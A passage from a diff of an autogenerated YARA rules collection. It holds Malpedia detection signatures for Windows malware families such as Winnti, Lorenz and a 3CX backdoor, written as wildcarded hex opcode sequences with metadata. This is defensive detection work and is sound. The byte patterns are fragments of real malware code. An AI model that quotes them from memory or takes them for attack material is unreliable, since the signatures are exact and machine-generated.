} - $sequence_10 = { 837d0803 0f8ceb000000 53 8b1d???????? 57 68???????? } - $sequence_11 = { ffd3 68???????? 68???????? 8985c5f9ffff ffd7 } - $sequence_12 = { c745f800000000 ff15???????? 85c0 0f94c0 8845ff 84c0 742e } - $sequence_13 = { 85ff 0f8448030000 8d55f0 52 6800040000 } - $sequence_14 = { ff2485181d0010 68???????? 8d8df8feffff 51 eb2f 68???????? } - $sequence_15 = { 81ea???????? 83c204 f7d2 8955ed } + $sequence_0 = { 33c8 234df0 8945fc 8b45f8 33cb 034e34 6a05 } + $sequence_1 = { 53 ff7580 ff7594 ff36 } + $sequence_2 = { 885d6f ff75d4 8d4510 50 8d4568 50 } + $sequence_3 = { 53 8b5d0c 8bce 2bde 3b7d10 7d23 } + $sequence_4 = { c645d543 c645d668 c645d765 c645d863 c645d96b c645da3a 885ddb } + $sequence_5 = { 8bec 8b4508 33c9 3bc1 7504 33c0 5d } + $sequence_6 = { ff15???????? 83f8ff 752b 8d45e8 50 c645e823 c645e92d } + $sequence_7 = { 85c0 7524 a1???????? a3???????? a1???????? c705????????b2194100 8935???????? } + $sequence_8 = { 0f84bf000000 56 53 50 e8???????? 56 } + $sequence_9 = { e8???????? 8d443001 59 895df4 3818 0f8430010000 50 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <335872 } -rule MALPEDIA_Win_Heloag_Auto : FILE +rule MALPEDIA_Win_Flawedgrace_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ef07a0f3-faff-581a-a00e-f3d94c2f2e27" + id = "62521b13-13e2-5f89-b92f-7685ad3e5d40" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.heloag_auto.yar#L1-L169" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flawedgrace_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "d41534ff803a8c13a09a17ccbef4333268f3c2d9e67aea8ce8ca3bb7d4a205eb" + logic_hash = "3a2e50b467b7ecb293ee257669feacddf7970c96ed36da3edcb02bab7c5dbcd0" score = 75 quality = 75 tags = "FILE" @@ -131320,40 +133917,34 @@ rule MALPEDIA_Win_Heloag_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 66ab aa 83c9ff 8bfe 33c0 } - $sequence_1 = { 8bf7 8bfa 8a15???????? c1e902 f3a5 8bc8 } - $sequence_2 = { 8d4dbc 51 ffd7 8b45c4 b919000000 } - $sequence_3 = { 8b0d???????? 51 e8???????? 6a14 e8???????? 8bf0 83c408 } - $sequence_4 = { f3a4 a2???????? a2???????? a3???????? } - $sequence_5 = { 7cc4 8b45fc 8b0d???????? 40 } - $sequence_6 = { 6a00 6a00 ffd0 33c9 a3???????? 85c0 0f95c1 } - $sequence_7 = { 8d8dacfdffff 68???????? 51 e8???????? 8b55b4 83c41c 66c745b80200 } - $sequence_8 = { 8b4e0c 3bcd 8b07 89442410 7464 } - $sequence_9 = { 894b0c 8a48ff fec1 8848ff eb3c 6a01 55 } - $sequence_10 = { 8b4108 50 e8???????? 6a01 } - $sequence_11 = { 85c0 7505 a1???????? 8b4c242c } - $sequence_12 = { 51 53 68???????? 8d4c2420 ff15???????? } - $sequence_13 = { 8a442413 6a00 8bce 8806 ff15???????? } - $sequence_14 = { 8b11 8bcf 52 6a00 50 ff15???????? } - $sequence_15 = { a1???????? 894304 8b5608 895308 8b4e0c 894b0c } + $sequence_0 = { 894110 8b450c 89411c 8a03 884124 8b45f4 c7411800000000 } + $sequence_1 = { c1e810 0fb6c0 330c85e0bb4500 0fb6c2 c1ea08 330c85e0b34500 334fb8 } + $sequence_2 = { ff15???????? 8bf8 85ff 0f8493000000 8bce e8???????? 8d5704 } + $sequence_3 = { 50 8b85c0feffff ff7004 50 e8???????? 8b55e8 } + $sequence_4 = { c68564dcffffda c68565dcffff02 c68566dcffff48 c68567dcffff65 c68568dcffff61 c68569dcffff70 c6856adcffff52 } + $sequence_5 = { c6857fcfffff48 c68580cfffff83 c68581cfffffec c68582cfffff20 c68583cfffff4c c68584cfffff8b c68585cfffffc8 } + $sequence_6 = { 3355f0 33da 8955e8 330c85e0d34500 8bc2 898eb0000000 8bca } + $sequence_7 = { c6852ee8ffff65 c6852fe8ffff6c c68530e8ffff6f c68531e8ffff63 c68532e8ffff00 c68533e8ffff00 c68534e8ffff50 } + $sequence_8 = { 8975fc e8???????? 50 83c010 50 51 } + $sequence_9 = { c68516e5ffff00 c68517e5ffff00 c68518e5ffff00 c68519e5ffff00 c6851ae5ffff00 c6851be5ffff00 c6851ce5ffff00 } condition: - 7 of them and filesize <401408 + 7 of them and filesize <966656 } -rule MALPEDIA_Win_Dinodas_Rat_Auto : FILE +rule MALPEDIA_Win_Lorenz_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0c2a0c7f-3a72-55a1-acff-1cca63da0ecc" + id = "10a95bcc-414b-5fdc-ba6f-70234a4a7232" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dinodas_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dinodas_rat_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lorenz_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "146f67c88b1bd9a83aac7a1be7e8f308bd7d506106d4fba538a0dc2d1ddf0d08" - score = 75 - quality = 75 + logic_hash = "b3150a02c51834520c50a8abe1ab216fe79abbf33e7abc68b4a01a1cc4acdf52" + score = 60 + quality = 45 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -131365,34 +133956,34 @@ rule MALPEDIA_Win_Dinodas_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c9 743b 8b10 8b04b2 8b400c 85c0 7409 } - $sequence_1 = { 6a18 c705????????acff4300 c705????????00000000 e8???????? 83c404 85c0 } - $sequence_2 = { 50 51 ffd3 83bdb85fffff00 75af 837e2c00 } - $sequence_3 = { 833c0e00 755b 8b5dd4 8b4304 80781500 8bd3 7522 } - $sequence_4 = { df6df8 df6de0 def9 dc0d???????? dd45d8 d8d9 dfe0 } - $sequence_5 = { 83bdd4c3ffff10 7306 8d85c0c3ffff 56 50 57 e8???????? } - $sequence_6 = { 8344241408 894c2420 83e908 89542434 8b542430 33db 8bf7 } - $sequence_7 = { 8b55d0 8b45cc 8b4dec 2bd0 41 c1fa02 894dec } - $sequence_8 = { e8???????? 8b8d6cffffff 8bb568ffffff 2bce b893244992 f7e9 03d1 } - $sequence_9 = { 7546 8b15???????? 6aff 52 ffd7 8d5d08 8d45f8 } + $sequence_0 = { 8b4de8 e8???????? 898568ffffff eb15 8b55fc 8b4258 8b4df4 } + $sequence_1 = { c6412901 837df800 7423 8b55fc c7420c00000000 8b45f8 8b08 } + $sequence_2 = { 8b8800080000 e8???????? 8945f0 8b4dfc 8b8900080000 e8???????? 8945e0 } + $sequence_3 = { 8b55fc 8b4214 8b08 83e901 8b55fc 8b4214 8908 } + $sequence_4 = { ff55e4 8b55f0 89828c000000 8b45f0 8b888c000000 51 8b4dec } + $sequence_5 = { 8b4dfc e8???????? 85c0 7426 68???????? 68???????? 6a00 } + $sequence_6 = { 8b4dfc e8???????? 8bc8 e8???????? 0fb6c8 85c9 7460 } + $sequence_7 = { 8b4df8 83e904 e8???????? 8bc8 e8???????? 0fb6c8 85c9 } + $sequence_8 = { 50 e8???????? 8945d8 837dd800 0f8445010000 8b4dd8 d1e1 } + $sequence_9 = { 8b4dec 8b11 895004 8b45ec 8945e8 8b4de8 51 } condition: - 7 of them and filesize <638976 + 7 of them and filesize <2254848 } -rule MALPEDIA_Win_Graphican_Auto : FILE +rule MALPEDIA_Win_Winnti_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a2f03fc9-ee25-5fcd-896d-9bb49120884f" + id = "3bce81c4-b806-55af-b179-e7a33535f793" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graphican_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.winnti_auto.yar#L1-L247" license_url = "N/A" - logic_hash = "a4c9c330e82d4ca3a447533684cd37026bb60c45e700ff39380301b043754c33" + logic_hash = "bb0b6cf106deb97c4eb44fec946685f152141bb95569eea2bec56d5f75cb75c8" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -131404,34 +133995,48 @@ rule MALPEDIA_Win_Graphican_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d5f07 83e3f8 03d3 3b10 7619 8b06 3bc3 } - $sequence_1 = { 3c65 7408 3c45 0f8570010000 47 807def00 897dc0 } - $sequence_2 = { 56 57 8bf1 8bfa 85db 7517 68a8010000 } - $sequence_3 = { 53 8bf0 6a00 56 e8???????? a1???????? } - $sequence_4 = { 8d0c89 8d4c48d0 8a07 42 3c30 7dd4 894de8 } - $sequence_5 = { 68???????? 68???????? e8???????? 83c40c 8b4ddc c7461810000000 894e1c } - $sequence_6 = { 8d85e8edffff 6a00 50 e8???????? 83c40c 68???????? } - $sequence_7 = { 68???????? 68???????? e8???????? 83c40c 8b5624 2b5620 } - $sequence_8 = { 8d8dc4efffff 51 50 ffd2 8bb5c4efffff 33ff } - $sequence_9 = { 8bd8 e8???????? 8d4311 83c404 } + $sequence_0 = { 51 52 8bce e8???????? 53 8bf8 ff15???????? } + $sequence_1 = { ff15???????? 663dffff 747b 663dfeff 7475 8b942494020000 83c9ff } + $sequence_2 = { c22000 8b4d00 56 6a03 68c8000000 51 ff15???????? } + $sequence_3 = { 8bf0 83c404 85f6 7509 5f 5e 83c8ff } + $sequence_4 = { 807a025c 75bf 83c203 8a0a 56 33f6 b801000000 } + $sequence_5 = { 895e08 895e0c ffd7 50 } + $sequence_6 = { 83c404 85db 0f84da000000 55 8b6c2430 56 57 } + $sequence_7 = { 6a01 52 6a02 8974243c 89742430 c644244800 ff15???????? } + $sequence_8 = { 488d8a40000000 e9???????? 488b8a40000000 4883c108 e9???????? 488b8a80000000 e9???????? } + $sequence_9 = { 48037c2470 48897c2478 488b8c2400010000 4885c9 741f 4183fe01 7513 } + $sequence_10 = { 4c8d25b6f10000 498b0c24 4d8bc5 488bd3 e8???????? 85c0 } + $sequence_11 = { 4803f7 4c03f7 41ffca 660f1f840000000000 478d0c1a } + $sequence_12 = { 75f8 488d15e1160000 b12e 482bd0 } + $sequence_13 = { 4963f9 48897db7 453bc5 0f8e4f020000 418bc0 412bc5 448be0 } + $sequence_14 = { 3918 0f4c18 3bcb 0f8d87000000 488d3d979c0a00 ba58000000 488bcd } + $sequence_15 = { 4c2bc1 0f1f00 410fb6440801 8811 } + $sequence_16 = { 4d85ed 7429 488d15fcd70a00 498bcd } + $sequence_17 = { 4c8bc7 48894768 488d4567 ba18822200 } + $sequence_18 = { 4889542410 53 4881ecb0000000 33db } + $sequence_19 = { 488d542450 4438742450 740a 6690 48ffc2 } + $sequence_20 = { 488d1debad0000 488d3d64ae0000 eb0e 488b03 4885c0 7402 } + $sequence_21 = { 8a45d9 4b8b8cf800a20b00 88443139 4b8b84f800a20b00 8854303a eb4c 493bde } + $sequence_22 = { 57 4156 4157 4883ec30 4c8bf1 33ff } + $sequence_23 = { 44895c391c 4963cb 488bd1 48c1fa10 498b8680000000 } condition: - 7 of them and filesize <362496 + 7 of them and filesize <1581056 } -rule MALPEDIA_Win_Mosquito_Auto : FILE +rule MALPEDIA_Win_Winordll64_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d845e95b-9b1b-51f7-92b1-5c116f68e381" + id = "32ecf8d5-2cad-5cae-b550-c4e57fba7837" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mosquito_auto.yar#L1-L192" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winordll64" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.winordll64_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "87ba9d2670a970e725fcb73c4f11150d5260680ad8d699153882d887044e12b1" + logic_hash = "633c933d5010a60000a71f7674b6b6d81d1af8a3edb249e8b101bbf4eb8e443f" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -131443,43 +134048,32 @@ rule MALPEDIA_Win_Mosquito_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f3a5 ff942464020000 81c450020000 85c0 } - $sequence_1 = { 52 50 6a00 6801c1fd7d } - $sequence_2 = { f7d8 1bc0 83e0b4 83c04c } - $sequence_3 = { 8b10 8bc8 57 6842730000 ff5204 56 } - $sequence_4 = { b994000000 8bfc f3a5 ff942464020000 } - $sequence_5 = { 8b10 8bc8 ff5204 56 } - $sequence_6 = { e8???????? 85c0 7517 8bcb e8???????? 8b7328 } - $sequence_7 = { e8???????? 6a20 e8???????? 83c40c } - $sequence_8 = { 8b00 33ff 57 6880000000 6a03 57 } - $sequence_9 = { e8???????? 6a20 8bf0 e8???????? 8bc8 } - $sequence_10 = { 8bfc f3a5 ff942460020000 81c450020000 } - $sequence_11 = { 6824080000 50 e8???????? 83c410 } - $sequence_12 = { 0000 006301 1000 7500 } - $sequence_13 = { 0000 0018 a0???????? 57 } - $sequence_14 = { 0000 0001 1001 c550f0 8b8078005900 } - $sequence_15 = { 0000 0032 08804d086440 5e } - $sequence_16 = { 0000 00645657 8b7dc2 0400 } - $sequence_17 = { 0000 006500 676c 0010 } - $sequence_18 = { ff15???????? 6a00 56 ff15???????? 8903 83f8ff } - $sequence_19 = { 0000 00748078 3001 40 } - $sequence_20 = { 6aff 5d c28bcf 7300 6a01 } + $sequence_0 = { e8???????? 488d4dbc ff15???????? 488d15ae1c0100 488bc8 e8???????? 85c0 } + $sequence_1 = { 4833c4 488985581d0000 488bd9 b838070000 48ffc8 c6040100 75f7 } + $sequence_2 = { 48897c2420 ff15???????? 85c0 7426 448b842490000000 4c8d4c2430 } + $sequence_3 = { e9???????? ba12000000 ebf0 48897c2440 897c2448 488d442448 4889442420 } + $sequence_4 = { e8???????? 4c8d0513c50000 41b903000000 488d4c45bc 488bc1 492bc5 } + $sequence_5 = { 488bcf c744243001000000 448be8 ff15???????? } + $sequence_6 = { 663918 75f5 4c8d4da0 48837db808 4c0f434da0 486307 } + $sequence_7 = { 7423 83fefe 741e 488bce 488bc6 488d1554370100 83e11f } + $sequence_8 = { 7767 488d4d98 482bcb 48b8abaaaaaaaaaaaa2a 48f7e9 488bf2 } + $sequence_9 = { 0f84bd010000 488b4c2450 4533c0 418bd5 ff15???????? 85c0 0f847b010000 } condition: - 7 of them and filesize <1015808 + 7 of them and filesize <278528 } -rule MALPEDIA_Win_Veiledsignal_Auto : FILE +rule MALPEDIA_Win_Poslurp_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "caf6fec1-c7fc-5e46-9ec5-501cbcaa1f6a" + id = "7a8f0443-88b1-5a4f-a35b-b7bc9acf8924" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.veiledsignal" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.veiledsignal_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poslurp_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "36bfcf538a747481c06e92b8c775b0fad665f748b3dccf3367e494f75f4840ed" + logic_hash = "95156f0f62f3b9458f6ba6ac285abaa70aca50d75127c0a8cc32d91b8191c0ea" score = 75 quality = 75 tags = "FILE" @@ -131493,32 +134087,32 @@ rule MALPEDIA_Win_Veiledsignal_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7516 488d05c7390400 4a8b04e8 42385cf839 0f84c2000000 488d05b1390400 } - $sequence_1 = { 488d0dbabb0400 48c7040102000000 b808000000 486bc000 488b0d???????? 48894c0420 b808000000 } - $sequence_2 = { 0f1f440000 488d54244c 488bce e8???????? 488bcb } - $sequence_3 = { 4881c458010000 c3 83f802 7571 488d0516010000 488905???????? 488d0529010000 } - $sequence_4 = { 7ec4 83c8ff eb0b 4803f6 418b84f7a8140100 85c0 } - $sequence_5 = { 81f95a290000 752b 488d0df8030000 b801000000 48890d???????? } - $sequence_6 = { 4c8d0d97960000 498bd1 448d4008 3b0a 742b ffc0 } - $sequence_7 = { e8???????? 488bd7 4c8d05e3270400 83e23f 488bcf 48c1f906 } - $sequence_8 = { 4883ec20 8b1d???????? eb1d 488d0573b10400 ffcb } - $sequence_9 = { ff15???????? 488b55cf 488bc8 ff15???????? 488b4dd7 } + $sequence_0 = { 0f87fd000000 668378203d 0f85f2000000 498bce } + $sequence_1 = { cc 33c9 ff15???????? cc 488bac2440010000 } + $sequence_2 = { 488bf5 498bfc f3a4 498bcc e8???????? } + $sequence_3 = { ff15???????? 4c8be8 4885c0 0f84c2000000 4863453c } + $sequence_4 = { 488d15a9100000 41b93f000f00 4533c0 48c7c102000080 } + $sequence_5 = { 418bc1 41ffc0 486bc022 4803c2 48ffc2 } + $sequence_6 = { 0f8301010000 418bd6 498bcf 8bfb 412bd7 } + $sequence_7 = { 0f84ae000000 80393d 0f85a5000000 418bd6 } + $sequence_8 = { 418bc8 ffce 488bd5 2bcd 8bfb } + $sequence_9 = { 488bd8 4883f8ff 0f84c8010000 448b05???????? 4889ac24a0020000 4889b424a8020000 4889bc24b0020000 } condition: - 7 of them and filesize <667648 + 7 of them and filesize <50176 } -rule MALPEDIA_Win_Open_Carrot_Auto : FILE +rule MALPEDIA_Win_3Cx_Backdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a3d97757-e9bd-5b96-a3d4-9f325722b76a" + id = "28fbb43b-1b49-58bb-9ada-865931dff5e6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.open_carrot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.open_carrot_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.3cx_backdoor_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "bc0e7aafdfe5fe87787ac92bf2b362a8818b18c35ce921dfe615312cba0c80f1" + logic_hash = "c22c772229b5508424567ef1d7e35b9960a69d5aa0f1d8dfccaad31a703d6c0c" score = 75 quality = 75 tags = "FILE" @@ -131532,32 +134126,32 @@ rule MALPEDIA_Win_Open_Carrot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b910000000 e8???????? 4889442430 c700ffffffff 48c74008ffffffff 8b4c2438 8908 } - $sequence_1 = { b9c8dcfb75 ffc1 c1e106 83e9ff 83c101 6807ab8f5e 4c893424 } - $sequence_2 = { ffd0 eb05 bd01000000 440fb6e5 443bed 7c7a 488b15???????? } - $sequence_3 = { 8bc3 e9???????? 41b805000000 488d153c9a1800 488bcf e8???????? 85c0 } - $sequence_4 = { ffcf 488d9512070000 4903d4 4c63c7 664289b445100f0000 e8???????? 6639b510170000 } - $sequence_5 = { 4881cb3f000000 48c7c000020000 4981c46f000000 4809f0 4d0fb72424 4881c204000000 4809c6 } - $sequence_6 = { 83fe07 7772 4c8d0dad8df9ff 4863c6 418b8481f0750600 4903c1 ffe0 } - $sequence_7 = { e9???????? 488d05de191400 894c2420 4c8d2dabb30f00 89742424 eb42 488d05aeb30f00 } - $sequence_8 = { 4c8d0d91850b00 8d4a98 448d42ef e8???????? e9???????? 4c8b4310 488bd7 } - $sequence_9 = { 7422 41b8a3000000 488d15c7ff0900 e8???????? 48898380000000 4885c0 0f842f010000 } + $sequence_0 = { 8bc8 c1e907 33c1 81c287d61200 8bc8 c1e116 33c1 } + $sequence_1 = { 84d2 7430 3811 742c e8???????? c70016000000 } + $sequence_2 = { 8bfb 48895c2430 4c89742428 4983e7f0 4d8d243f 498d442410 } + $sequence_3 = { 4a0fbe841940250300 428a8c1950250300 482bd0 8b42fc d3e8 49895108 41894118 } + $sequence_4 = { 4c8bce 4c8bc5 488bd7 498bcf e8???????? 498bc6 488b5c2460 } + $sequence_5 = { 498bd7 4489642448 48897c2440 44894c2438 4c8d4d97 4889442430 4489642428 } + $sequence_6 = { 7428 85db 7524 488d0d7ef90200 e8???????? 85c0 7510 } + $sequence_7 = { 4889742458 488b7108 33d2 488bce 48c1eb05 492bc9 } + $sequence_8 = { 4983c708 4533d2 32d2 4c897c2420 80fb30 7512 b201 } + $sequence_9 = { 0fb608 880a 488d5210 488b4808 48894af8 448820 } condition: - 7 of them and filesize <8377344 + 7 of them and filesize <585728 } -rule MALPEDIA_Win_Socelars_Auto : FILE +rule MALPEDIA_Win_Xsplus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b06c7ac2-d920-55f6-9edd-c06a57d2d404" + id = "fb41ffbb-1e2d-5bdd-9365-c97018c55362" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.socelars_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xsplus_auto.yar#L1-L178" license_url = "N/A" - logic_hash = "29f15e383674389295d6d5d873e2a8fae68e30508b53f5e863e0aef43fe3264f" + logic_hash = "1413c5b641befe4b985d097bf7fa94a2fd076afb28674d33f79669c0d9d8240e" score = 75 quality = 75 tags = "FILE" @@ -131571,32 +134165,39 @@ rule MALPEDIA_Win_Socelars_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f6462808 894618 7515 8b4c243c ba14000000 e8???????? 89842430010000 } - $sequence_1 = { 8b4dfc 83b9cc03000020 7409 c745c00c000000 eb07 c745c00e000000 8b55fc } - $sequence_2 = { ff460c 807e0a00 750a 8bce e8???????? 8a4e09 8b430c } - $sequence_3 = { ff730c ff7308 e8???????? 8bf8 83c410 85ff 0f8480000000 } - $sequence_4 = { 8b542410 8b5248 f6421c20 0f8437050000 8b4214 ff4878 8b8888000000 } - $sequence_5 = { e9???????? 8b4c243c 33c0 89842430010000 ba43000000 8b472c 40 } - $sequence_6 = { f7da 56 1bd2 83c235 eb55 6a00 ff77c4 } - $sequence_7 = { e8???????? 83c40c eb36 8d4201 898188000000 8d0c92 8b442438 } - $sequence_8 = { fe4613 8a4619 fec8 0fb6c8 884619 3bf9 7d24 } - $sequence_9 = { ff742424 e8???????? 83c40c eb32 8b54241c 8d4101 898688000000 } + $sequence_0 = { 8b761c 8b4608 8b7e20 8b36 66394f18 75f2 } + $sequence_1 = { 0fb602 33c1 8b4d0c 034dfc 8801 } + $sequence_2 = { 83c408 8945f0 837df000 750f } + $sequence_3 = { e9???????? 8be5 5d c3 3b0d???????? } + $sequence_4 = { 8b45f4 83c001 8945f4 ebbf eb2c 6a08 8d4df8 } + $sequence_5 = { 895018 8b4df8 8b511c 83ea01 } + $sequence_6 = { c6864b01000043 c74668e0a34000 6a0d e8???????? 59 8365fc00 } + $sequence_7 = { 0345fc 8a08 880a c745f800000000 } + $sequence_8 = { 8d8df4fdffff 51 ff15???????? 8985ecfcffff 83bdecfcffffff 7565 6804010000 } + $sequence_9 = { 8b5118 d1e2 8b45f8 895018 8b4df8 } + $sequence_10 = { c745fc04000000 eb2d 8b5510 83e204 } + $sequence_11 = { 83c101 898de8feffff 8b550c 52 e8???????? } + $sequence_12 = { 8a800ca84000 08443b1d 0fb64601 47 3bf8 76ea } + $sequence_13 = { 8a15???????? 889500ffffff b93f000000 33c0 8dbd01ffffff f3ab 66ab } + $sequence_14 = { f3a5 8b45fc ffd0 5f 5e 8be5 } + $sequence_15 = { 8b4d08 51 ff15???????? b801000000 e9???????? 6a00 ff15???????? } + $sequence_16 = { 8975e0 8db120a84000 8975e4 eb2a 8a4601 } condition: - 7 of them and filesize <2151424 + 7 of them and filesize <597872 } -rule MALPEDIA_Win_Polpo_Auto : FILE +rule MALPEDIA_Win_Holerun_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f09c9fa9-68a5-510c-9c07-2bf30033e8be" + id = "3860635a-d58f-5696-9faf-227bf0bff05b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polpo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.polpo_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.holerun" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.holerun_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "d086587d6209a1b4d39f14c8bf11bcdd8bb5ac2527f8607c317abb5534459f55" + logic_hash = "5a5dd43f05b56cbfa86f75c5f65da136c78c894cffec56359e16aa1bc679245f" score = 75 quality = 75 tags = "FILE" @@ -131610,32 +134211,32 @@ rule MALPEDIA_Win_Polpo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6800040000 8d8decfbffff 51 50 ffd7 6a00 } - $sequence_1 = { 50 8d85ecf7ffff 50 8d8decfbffff 51 ff15???????? 40 } - $sequence_2 = { 6a02 52 ff15???????? 8b03 50 ff15???????? } - $sequence_3 = { c1e606 03348540b30120 8b45f8 8b00 8906 } - $sequence_4 = { 57 33c0 6806020000 898d98f9ffff 50 8d8df6fdffff 51 } - $sequence_5 = { 8d854cffffff 8bd0 8d642400 8a08 40 3acb 75f9 } - $sequence_6 = { 52 50 ff15???????? 6a00 6800040000 8d8dfcfaffff 68???????? } - $sequence_7 = { 8a08 40 3acb 75f9 2bc6 8dbd4cf7ffff } - $sequence_8 = { 51 8985d0dfffff 8985d4dfffff 8885dcdfffff e8???????? } - $sequence_9 = { ffd6 85c0 8b859cfdffff 50 0f8516020000 ff15???????? 8d45a4 } + $sequence_0 = { 85c0 740c c785ec00000000000000 eb63 488b05???????? } + $sequence_1 = { e8???????? 8b45c4 83f840 7472 8b45c4 83f804 } + $sequence_2 = { c744242000010000 41b901000000 41b800000000 ba03000000 4889c1 } + $sequence_3 = { 488b85e0000000 488b4020 4889c1 488b05???????? ffd0 } + $sequence_4 = { ffd0 488b85e0000000 488b4020 4889c1 488b05???????? } + $sequence_5 = { ffd0 8b85cc030000 4881c458040000 5b 5d c3 } + $sequence_6 = { 4883c00f 48c1e804 48c1e004 e8???????? 4829c4 } + $sequence_7 = { eb1e 8345f401 488345f828 488b45e8 0fb74006 0fb7c0 } + $sequence_8 = { c705????????00000000 c705????????00000000 8b45fc 8905???????? } + $sequence_9 = { 488b4d10 e8???????? 4885c0 7507 b8ffffffff eb05 } condition: - 7 of them and filesize <250880 + 7 of them and filesize <156672 } -rule MALPEDIA_Win_Purplewave_Auto : FILE +rule MALPEDIA_Win_Mim221_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bc61a32f-ee96-5e25-892f-9d381408f659" + id = "e2e82536-e29b-53d1-8c95-30ff68363ca9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.purplewave_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mim221" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mim221_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "5efe0dc0002836bd228e34e2c06d2e0edc1c85c62aac77610517f67f8f987125" + logic_hash = "bd7d2b077259a6edc03c8b758f8bad3f5a42643cb60c61d80165934010c8f5e6" score = 75 quality = 75 tags = 